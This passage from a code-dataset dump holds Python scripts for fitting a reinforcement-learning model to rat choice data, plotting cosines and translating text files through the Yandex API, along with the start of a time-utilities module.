"ta.momentum.stochrsi", "line_number": 330, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 330, "usage_type": "attribute"}, {"api_name": "ta.momentum.StochRSIIndicator", "line_number": 332, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 332, "usage_type": "attribute"}, {"api_name": "ta.momentum.StochRSIIndicator", 
"line_number": 334, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 334, "usage_type": "attribute"}, {"api_name": "ta.momentum.StochRSIIndicator", "line_number": 349, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 349, "usage_type": "attribute"}, {"api_name": "ta.momentum.StochRSIIndicator", "line_number": 372, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 372, "usage_type": "attribute"}, {"api_name": "ta.momentum.StochRSIIndicator", "line_number": 374, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 374, "usage_type": "attribute"}, {"api_name": "ta.momentum.StochRSIIndicator", "line_number": 376, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 376, "usage_type": "attribute"}, {"api_name": "ta.volatility.AverageTrueRange", "line_number": 400, "usage_type": "call"}, {"api_name": "ta.volatility", "line_number": 400, "usage_type": "attribute"}, {"api_name": "ta.momentum.awesome_oscillator", "line_number": 415, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 415, "usage_type": "attribute"}, {"api_name": "ta.momentum.awesome_oscillator", "line_number": 436, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 436, "usage_type": "attribute"}, {"api_name": "ta.volatility.BollingerBands", "line_number": 456, "usage_type": "call"}, {"api_name": "ta.volatility", "line_number": 456, "usage_type": "attribute"}, {"api_name": "ta.trend.sma_indicator", "line_number": 460, "usage_type": "call"}, {"api_name": "ta.trend", "line_number": 460, "usage_type": "attribute"}, {"api_name": "ta.trend.SMAIndicator", "line_number": 494, "usage_type": "call"}, {"api_name": "ta.trend", "line_number": 494, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 524, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 526, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 528, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 531, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 535, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 536, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 539, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 541, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 543, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 546, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 550, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 552, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 554, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 556, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 558, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 561, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 564, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 568, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 570, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 572, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 574, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 576, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 581, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 583, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 585, "usage_type": "call"}, {"api_name": 
"numpy.where", "line_number": 587, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 591, "usage_type": "call"}, {"api_name": "finta.TA.WILLIAMS", "line_number": 606, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 606, "usage_type": "name"}, {"api_name": "finta.TA.STOCH", "line_number": 609, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 609, "usage_type": "name"}, {"api_name": "finta.TA.STOCHD", "line_number": 612, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 612, "usage_type": "name"}, {"api_name": "finta.TA.ER", "line_number": 615, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 615, "usage_type": "name"}, {"api_name": "finta.TA.STC", "line_number": 618, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 618, "usage_type": "name"}, {"api_name": "finta.TA.ADX", "line_number": 621, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 621, "usage_type": "name"}, {"api_name": "finta.TA.ROC", "line_number": 624, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 624, "usage_type": "name"}, {"api_name": "finta.TA.MOM", "line_number": 627, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 627, "usage_type": "name"}, {"api_name": "ta.trend.ema_indicator", "line_number": 672, "usage_type": "call"}, {"api_name": "ta.trend", "line_number": 672, "usage_type": "attribute"}, {"api_name": "ta.trend.ema_indicator", "line_number": 673, "usage_type": "call"}, {"api_name": "ta.trend", "line_number": 673, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 691, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 692, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 693, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 695, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 699, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 700, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 701, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 705, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 706, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 707, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 708, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 712, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 713, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 714, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 715, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 717, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 721, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 722, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 723, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 724, "usage_type": "call"}, {"api_name": "pandas.core", "line_number": 749, "usage_type": "attribute"}, {"api_name": "numpy.datetime64", "line_number": 750, "usage_type": "attribute"}, {"api_name": "numpy.issubdtype", "line_number": 751, "usage_type": "call"}, {"api_name": "numpy.datetime64", "line_number": 751, "usage_type": "attribute"}, {"api_name": "pandas.to_datetime", "line_number": 752, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 782, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 782, "usage_type": "attribute"}, {"api_name": "numpy.nan", 
"line_number": 782, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 801, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 806, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 807, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 808, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 809, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 837, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 842, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 843, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 844, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 845, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 865, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 865, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 870, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 870, "usage_type": "attribute"}]}
+{"seq_id": "74087888168", "text": "import numpy as np\nimport numpy.random as random\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport copy\nimport os\n\nclass participant():\n \"\"\"\n class to keep values of participant, predict selection, and update values\n according to reward for Single Context Experiments\n\n key attribute:\n self.values, list, in the form of [[V_AL, V_AR], [V_BL, V_BR]]. Only the\n two values related to the input sequence will be used. Based on the mode,\n two or four values will be upgraded.\n\n self.alphas, learning rate matrix, list, in the form of [[a_AL, a_AR], [a_BL, a_BR]],\n each alpha is a constant and not updated throughout the process.\n\n self.beta, the linear parameter of stockxxxxx, should be between 0 and 1?\n\n Since values and alphas are in the form of x_ij, where i/j = 0 for A/L, or 1 for B/R,\n the calculation can be made by using index of list, which, hopefully, will be easier.\n\n self.mode, 2 or 4, marking if only 2 values will be updated, or all four values will be\n updated, as suggested by different model\n\n self.values_history, list of all past values, so a list of list (which is of list again)\n \"\"\"\n\n def __init__(self, name=None, values=[[1,0],[0.5,0.5]], alphas=[[0.3,0.1],[0.1,0.3]], beta=1.0, mode=2):\n if name is None:\n self.name = \"participant\"\n else:\n self.name = str(name)\n\n self.values = values\n #print(\"Init Values: {v}\".format(v = self.values))\n self.values_history = [[[],[]],[[],[]]]\n self.alphas = alphas\n self.beta = beta\n\n self.possible_sequence = [\"A\", \"B\"]\n self.possible_response = [\"L\", \"R\"]\n\n assert mode in [1,2,4], \"Unknown mode, set mode to 1, 2 or 4!\"\n self.mode = mode\n\n def getProbabilities(self, sequence):\n # Calculate P_L and P_R from values\n V_L, V_R = self.values[self.possible_sequence.index(sequence)]\n Z = self.beta * (V_L - V_R)\n P_L = 1 / (1 + np.exp(-1 * Z))\n return P_L, 1-P_L\n\n def makeSelection(self, sequence):\n P_L, P_R = self.getProbabilities(sequence)\n if random.uniform(0, 1) <= P_L:\n return 0, \"L\"\n else:\n return 1, \"R\"\n\n def upgradeValues(self, sequence, response, reward):\n self.values_history[0][0].append(self.values[0][0])\n self.values_history[1][0].append(self.values[1][0])\n self.values_history[1][1].append(self.values[1][1])\n self.values_history[0][1].append(self.values[0][1])\n\n idx_seq = self.possible_sequence.index(sequence)\n idx_seq_re = abs(1 - idx_seq)\n idx_res = self.possible_response.index(response)\n idx_res_re = abs(1 - idx_res)\n\n self.values[idx_seq][idx_res] = self.values[idx_seq][idx_res] + \\\n self.alphas[idx_seq][idx_seq] * \\\n (reward - self.values[idx_seq][idx_res])\n\n if self.mode >= 2:\n self.values[idx_seq_re][idx_res] = self.values[idx_seq_re][idx_res] + \\\n self.alphas[idx_seq][idx_seq_re] * \\\n (reward - self.values[idx_seq_re][idx_res])\n\n if self.mode == 4:\n self.values[idx_seq][idx_res_re] = self.values[idx_seq][idx_res_re] + \\\n self.alphas[idx_seq][idx_seq] * \\\n (1 - reward - self.values[idx_seq][idx_res_re])\n\n self.values[idx_seq_re][idx_res_re] = self.values[idx_seq_re][idx_res_re] + \\\n self.alphas[idx_seq][idx_seq_re] * \\\n (1 - reward - self.values[idx_seq_re][idx_res_re])\n\n\nclass probabilityCalculator():\n def __init__(self, subject_no=9, mode=2, assist_alpha=True):\n data_filename = \"/media/zhemengwu/Gigantic Data/SingleContextSequence/Result/\" \\\n \"SingleContext_Rat\" + str(subject_no) + \".csv\"\n self.df = pd.read_csv(data_filename, sep=\",\")\n subject_name = 
data_filename.split(\"_\")[-1]\n self.subject_name = subject_name.split(\".\")[0]\n self.mode=mode\n self.subject_no = subject_no\n self.assist_alpha = assist_alpha\n\n def _calcEngine(self, alpha_starts = [[0,0],[0,0]], alpha_ends=[[1,1],[1,1]], step=0.1):\n result_df = pd.DataFrame(columns=[\"Alpha_00\",\"Alpha_01\",\"Alpha_10\",\"Alpha_11\",\"Ln_Likelyhood\"])\n name = self.subject_name\n alphas = [[1,2],[3,4]]\n for i in [0,1]:\n for j in [0,1]:\n alphas[i][j] = np.arange(np.max([alpha_starts[i][j],0]),\n np.min([1,alpha_ends[i][j]]), step)\n if not self.assist_alpha:\n alphas[0][1] = np.array([0])\n alphas[1][0] = np.array([0])\n print(\"alphas created\")\n\n for i, alpha_00 in enumerate(alphas[0][0]):\n print(\"Alpha_00: {v:.3f}, {i}/{j}\".format(v=alpha_00, i=i+1, j=len(alphas[0][0])))\n for alpha_01 in alphas[0][1]:\n for alpha_10 in alphas[1][0]:\n for alpha_11 in alphas[1][1]:\n alphas2use = [[alpha_00, alpha_01],[alpha_10, alpha_11]]\n probability_sum = 0.0\n\n if self.subject_no <= 16:\n p = participant(name=name, values=[[1,0],[1,0]],\n alphas=alphas2use, beta=1.0, mode=self.mode)\n else:\n p = participant(name=name, values=[[0,1],[0,1]],\n alphas=alphas2use, beta=1.0, mode=self.mode)\n\n #print(\"Alphas: {a}\".format(a=alphas2use))\n for i in range(len(self.df)):\n seq_trial = self.df[\"Sequence\"].iloc[i]\n res_trial = self.df[\"Response\"].iloc[i]\n reward = self.df[\"Correct\"].iloc[i]\n if res_trial in [\"L\", \"R\"]:\n prob_trial = p.getProbabilities(seq_trial)\n probability_sum = probability_sum + np.log(prob_trial[p.possible_response.index(res_trial)])\n p.upgradeValues(seq_trial, res_trial, reward)\n\n df_try = pd.DataFrame([[alpha_00, alpha_01, alpha_10, alpha_11, probability_sum]],\n columns=[\"Alpha_00\",\"Alpha_01\",\"Alpha_10\",\"Alpha_11\",\"Ln_Likelyhood\"])\n result_df = result_df.append(df_try)\n\n idx = result_df[\"Ln_Likelyhood\"] == result_df[\"Ln_Likelyhood\"].max()\n best_alphas = [[result_df[\"Alpha_00\"].loc[idx].values[0],result_df[\"Alpha_01\"].loc[idx].values[0]],\\\n [result_df[\"Alpha_10\"].loc[idx].values[0],result_df[\"Alpha_11\"].loc[idx].values[0]]]\n return best_alphas, result_df\n\n\nrootpath = \"/media/zhemengwu/Gigantic Data/SingleContextSequence/RL_Model\"\nif not os.path.exists(rootpath):\n os.mkdir(rootpath)\n\n#for subject_no in np.arange(12,13,1):\nsubject_all = np.arange(9, 25, 1)\nsubject_all = subject_all[subject_all != 18]\nfor subidx, subject_no in enumerate(subject_all):\n if not os.path.exists(os.path.join(rootpath, \"Rat_{s}\".format(s=subject_no))):\n os.mkdir(os.path.join(rootpath, \"Rat_{s}\".format(s=subject_no)))\n for mode in [1,2,3,4]:\n print(\"=\"*30)\n print(\"Subject {s}, {i}/15; mode: {m}\".format(s=subject_no, i=subidx+1, m=mode))\n if mode == 1:\n Pcalculator = probabilityCalculator(subject_no=subject_no, mode=2, assist_alpha=False)\n elif mode == 3:\n Pcalculator = probabilityCalculator(subject_no=subject_no, mode=4, assist_alpha=False)\n else:\n Pcalculator = probabilityCalculator(subject_no=subject_no, mode=mode, assist_alpha=True)\n\n alpha_starts = [[0, 0], [0, 0]]\n alpha_ends = [[1, 1], [1, 1]]\n for i, step in enumerate([0.1,0.02,0.004,0.001]):\n print(\"Cycle {i}...\".format(i=i+1))\n best_alphas, result_df = Pcalculator._calcEngine(alpha_starts=alpha_starts, alpha_ends=alpha_ends, step=step)\n print(best_alphas)\n filename = os.path.join(rootpath,\n \"Rat_{s}\".format(s=subject_no),\n \"Rat{s}_Mode{m}_Cycle{i}.csv\".format(s=subject_no, m=mode, i=i+1))\n with open(filename, \"w\") as f:\n 
f.write(result_df.to_csv(index=False))\n alpha_starts = np.array(best_alphas) - step\n alpha_ends = np.array(best_alphas) + step\n\n\n###################################################33\n# Output results\ncolumns = [\"Subject\", \"N_Trials\",\n \"Mode1_LnLikelyhood\", \"Mode1_LnLikelyhood_Pertrial\",\n \"Mode1_Alpha_00\",\"Mode1_Alpha_01\", \"Mode1_Alpha_10\",\"Mode1_Alpha_11\",\n \"Mode2_LnLikelyhood\", \"Mode2_LnLikelyhood_Pertrial\",\n \"Mode2_Alpha_00\",\"Mode2_Alpha_01\", \"Mode2_Alpha_10\",\"Mode2_Alpha_11\",\n \"Mode3_LnLikelyhood\", \"Mode3_LnLikelyhood_Pertrial\",\n \"Mode3_Alpha_00\",\"Mode3_Alpha_01\", \"Mode3_Alpha_10\",\"Mode3_Alpha_11\",\n \"Mode4_LnLikelyhood\", \"Mode4_LnLikelyhood_Pertrial\",\n \"Mode4_Alpha_00\",\"Mode4_Alpha_01\", \"Mode4_Alpha_10\",\"Mode4_Alpha_11\"]\ndf_sum = pd.DataFrame(columns=columns)\n\nfor subject_no in subject_all:\n if not os.path.exists(os.path.join(rootpath, \"Rat_{s}\".format(s=subject_no))):\n os.mkdir(os.path.join(rootpath, \"Rat_{s}\".format(s=subject_no)))\n\n session_df_file = os.path.join(\"/media/zhemengwu/Gigantic Data/SingleContextSequence\",\n \"Result\", \"SingleContext_Rat{s}.csv\".format(s=subject_no))\n session_df = pd.read_csv(session_df_file, sep=\",\")\n session_df = session_df.loc[session_df[\"Response\"] != \"N\"]\n sub_name = \"Rat_{s}\".format(s=subject_no)\n n_trials = len(session_df)\n values = [sub_name, n_trials]\n\n for mode in [1,2,3,4]:\n print(\"=\" * 30)\n print(\"Subject {s}, mode: {m}\".format(s=subject_no, m=mode))\n\n # get mode2use and best-alphas\n if mode in [1,3]:\n mode2use = mode + 1\n else:\n mode2use = mode\n\n alpha_filename = os.path.join(rootpath,\n \"Rat_{s}\".format(s=subject_no),\n \"Rat{s}_Mode{m}_Cycle4.csv\".format(s=subject_no, m=mode))\n result_df = pd.read_csv(alpha_filename, sep=\",\")\n idx = result_df[\"Ln_Likelyhood\"] == result_df[\"Ln_Likelyhood\"].max()\n best_alphas = [[result_df[\"Alpha_00\"].loc[idx].median(), result_df[\"Alpha_01\"].loc[idx].median()], \\\n [result_df[\"Alpha_10\"].loc[idx].median(), result_df[\"Alpha_11\"].loc[idx].median()]]\n # apend values for df_sum\n values.append(result_df[\"Ln_Likelyhood\"].max())\n values.append(result_df[\"Ln_Likelyhood\"].max() / n_trials)\n values.append(result_df[\"Alpha_00\"].loc[idx].median())\n values.append(result_df[\"Alpha_01\"].loc[idx].median())\n values.append(result_df[\"Alpha_10\"].loc[idx].median())\n values.append(result_df[\"Alpha_11\"].loc[idx].median())\n\n # re-calculate values\n if subject_no <= 16:\n rat = participant(name=sub_name, values=[[1,0],[1,0]],\n alphas=best_alphas, beta=1.0, mode=mode2use)\n else:\n rat = participant(name=sub_name, values=[[0,1],[0,1]],\n alphas=best_alphas, beta=1.0, mode=mode2use)\n seqA_X, seqA_Y = [], []\n seqB_X, seqB_Y = [], []\n for i in range(len(session_df)):\n seq_trial = session_df[\"Sequence\"].iloc[i]\n res_trial = session_df[\"Response\"].iloc[i]\n reward = session_df[\"Correct\"].iloc[i]\n if res_trial in [\"L\", \"R\"]:\n rat.upgradeValues(seq_trial, res_trial, reward)\n if seq_trial == \"A\":\n seqA_X.append(i)\n seqA_Y.append(reward)\n else:\n seqB_X.append(i)\n seqB_Y.append(reward)\n # other parameter for plot\n x_plot = np.arange(len(session_df))\n\n # Sequence A Values\n fig = plt.figure(figsize=(12, 6), dpi=200)\n ax1 = fig.add_subplot(1, 1, 1)\n if subject_no <= 16:\n ax1.plot(x_plot, np.array(rat.values_history[0][0]), \"b\")\n ax1.plot(x_plot, np.array(rat.values_history[0][1]), \"r\")\n else:\n ax1.plot(x_plot, np.array(rat.values_history[0][0]), \"r\")\n 
ax1.plot(x_plot, np.array(rat.values_history[0][1]), \"b\")\n colormap = [\"r\", \"b\"]\n shapemap = [\"x\", \"o\"]\n for x, y in zip(seqA_X, seqA_Y):\n ax1.scatter(x, (y-0.5) * 1.05 + 0.5, color=colormap[y], marker=shapemap[y], s=5)\n ax1.set_xlabel(\"Sequences A Values\", fontsize=12)\n ax1.set_ylim([-0.03,1.03])\n ax1.set_xlim([0, n_trials])\n ax1.grid()\n filename = os.path.join(rootpath, \"Rat_{s}\".format(s=subject_no), \"SequenceA_Mode{m}.png\".format(m=mode))\n plt.savefig(filename)\n plt.close(fig)\n\n # Sequence B Values\n fig = plt.figure(figsize=(12, 6), dpi=200)\n ax2 = fig.add_subplot(1, 1, 1)\n if subject_no <= 16:\n ax2.plot(x_plot, np.array(rat.values_history[1][0]), \"r\")\n ax2.plot(x_plot, np.array(rat.values_history[1][1]), \"b\")\n else:\n ax2.plot(x_plot, np.array(rat.values_history[1][0]), \"b\")\n ax2.plot(x_plot, np.array(rat.values_history[1][1]), \"r\")\n colormap = [\"r\", \"b\"]\n shapemap = [\"x\", \"o\"]\n for x, y in zip(seqB_X, seqB_Y):\n ax2.scatter(x, (y-0.5) * 1.05 + 0.5, color=colormap[y], marker=shapemap[y], s=5)\n ax2.set_xlabel(\"Sequences B Values\", fontsize=12)\n ax2.set_ylim([-0.03,1.03])\n ax2.set_xlim([0, n_trials])\n ax2.grid()\n filename = os.path.join(rootpath, \"Rat_{s}\".format(s=subject_no), \"SequenceB_Mode{m}.png\".format(m=mode))\n plt.savefig(filename)\n plt.close(fig)\n\n df2add = pd.DataFrame([values], columns=columns)\n df_sum = df_sum.append(df2add, ignore_index=True)\n\nwith open(os.path.join(rootpath, \"Summary.csv\"), \"w\") as f:\n f.write(df_sum.to_csv(index=False))\n\n\n\n\n\n", "repo_name": "HaoyuFan-DIB/RatChoice", "sub_path": "RL_Model/RL_Model.py", "file_name": "RL_Model.py", "file_ext": "py", "file_size_in_byte": 14389, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.exp", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 59, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 98, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 140, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 143, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 154, "usage_type": "call"}, {"api_name": "os.path", "line_number": 154, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 158, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 161, "usage_type": "call"}, {"api_name": "os.path", "line_number": 161, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 161, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 162, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 162, "usage_type": "call"}, {"api_name": "os.path", "line_number": 162, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 179, "usage_type": "call"}, {"api_name": "os.path", "line_number": 179, "usage_type": 
"attribute"}, {"api_name": "numpy.array", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 185, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 199, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 202, "usage_type": "call"}, {"api_name": "os.path", "line_number": 202, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 202, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 203, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 203, "usage_type": "call"}, {"api_name": "os.path", "line_number": 203, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 205, "usage_type": "call"}, {"api_name": "os.path", "line_number": 205, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 207, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 223, "usage_type": "call"}, {"api_name": "os.path", "line_number": 223, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 226, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 260, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 263, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 263, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 266, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 267, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 270, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 279, "usage_type": "call"}, {"api_name": "os.path", "line_number": 279, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 280, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 280, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 281, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 281, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 284, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 284, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 287, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 288, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 290, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 291, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 300, "usage_type": "call"}, {"api_name": "os.path", "line_number": 300, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 301, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 301, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 302, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 302, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 304, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 307, "usage_type": "call"}, {"api_name": "os.path", "line_number": 307, "usage_type": "attribute"}]}
+{"seq_id": "5197869489", "text": "import matplotlib.pyplot as plot\nimport numpy as np\n\nx = np.arange(0, 10, 0.1)\ny = np.cos(1*x)\nz = np.cos(3*x)\n\nplot.plot(x,y)\nplot.plot(x,z)\nplot.show()\n\n", "repo_name": "esineokov/ml", "sub_path": "math/lesson/1/4.py", "file_name": "4.py", "file_ext": "py", "file_size_in_byte": 155, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.arange", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 6, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 8, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 9, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 10, "usage_type": "name"}]}
+{"seq_id": "34211031227", "text": "import requests\n# документация https://yandex.ru/dev/translate/doc/dg/reference/translate-docpage/\n\nAPI_KEY = ''\nURL = 'https://translate.yandex.net/api/v1.5/tr.json/translate'\n\ndef translate_it(text, lang, to_lang):\n \"\"\"\n https://translate.yandex.net/api/v1.5/tr.json/translate ?\n key=\n & text=<переводимый текст>\n & lang=<направление перевода>\n & [format=<формат текста>]\n & [options=<опции перевода>]\n & [callback=<имя callback-функции>]\n :param to_lang:\n :return:\n \"\"\"\n\n params = {\n 'key': API_KEY,\n 'text': text,\n 'lang': '{}-{}'.format(lang, to_lang),\n }\n\n response = requests.get(URL, params=params)\n json_ = response.json()\n return ''.join(json_['text'])\n\n\n# print(translate_it('В настоящее время доступна единственная опция — признак включения в ответ автоматически определенного языка переводимого текста. \n# Этому соответствует значение 1 этого параметра.', 'no'))\n\ndef open_txt(file_name):\n with open(file_name, 'r', encoding='utf-8') as f:\n data = [l.strip() for l in f]\n return data\n\ndef write_txt(file_name, data):\n with open(file_name, 'w', encoding='utf-8') as f:\n f.write(data)\n\n\ntranslated_data_de = translate_it(open_txt('DE.txt'), 'de', 'ru')\nprint(translated_data_de)\nwrite_txt('TranslatedDE.txt', translated_data_de)\n\ntranslated_data_es = translate_it(open_txt('ES.txt'), 'es', 'ru')\nprint(translated_data_es)\nwrite_txt('TranslatedES.txt', translated_data_es)\n\ntranslated_data_fr = translate_it(open_txt('FR.txt'), 'fr', 'ru')\nprint(translated_data_fr)\nwrite_txt('TranslatedFR.txt', translated_data_fr)\n\n\n", "repo_name": "m1amgn/ya_api_translate", "sub_path": "yandex_translate_hw.py", "file_name": "yandex_translate_hw.py", "file_ext": "py", "file_size_in_byte": 1879, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 26, "usage_type": "call"}]}
+{"seq_id": "18913289060", "text": "#!/usr/bin/env python\nu\"\"\"\ntime.py\nWritten by Tyler Sutterley (11/2021)\nUtilities for calculating time operations\n\nPYTHON DEPENDENCIES:\n numpy: Scientific Computing Tools For Python\n https://numpy.org\n dateutil: powerful extensions to datetime\n https://dateutil.readthedocs.io/en/stable/\n\nUPDATE HISTORY:\n Updated 11/2021: added function for calendar year (decimal) to Julian Day \n Updated 09/2021: add functions for converting to and from GRACE months\n Updated 05/2021: define int/float precision to prevent deprecation warning\n Updated 02/2021: added adjust_months function to fix special months cases\n Updated 01/2021: add date parser for cases when only a date and no units\n Updated 12/2020: merged with convert_julian and convert_calendar_decimal\n added calendar_days routine to get number of days per month\n Updated 09/2020: parse date strings \"time-units since yyyy-mm-dd hh:mm:ss\"\n Updated 08/2020: added NASA Earthdata routines for downloading from CDDIS\n Written 07/2020\n\"\"\"\nimport datetime\nimport numpy as np\nimport dateutil.parser\n\n#-- PURPOSE: parse a date string into epoch and units scale\ndef parse_date_string(date_string):\n \"\"\"\n parse a date string of the form time-units 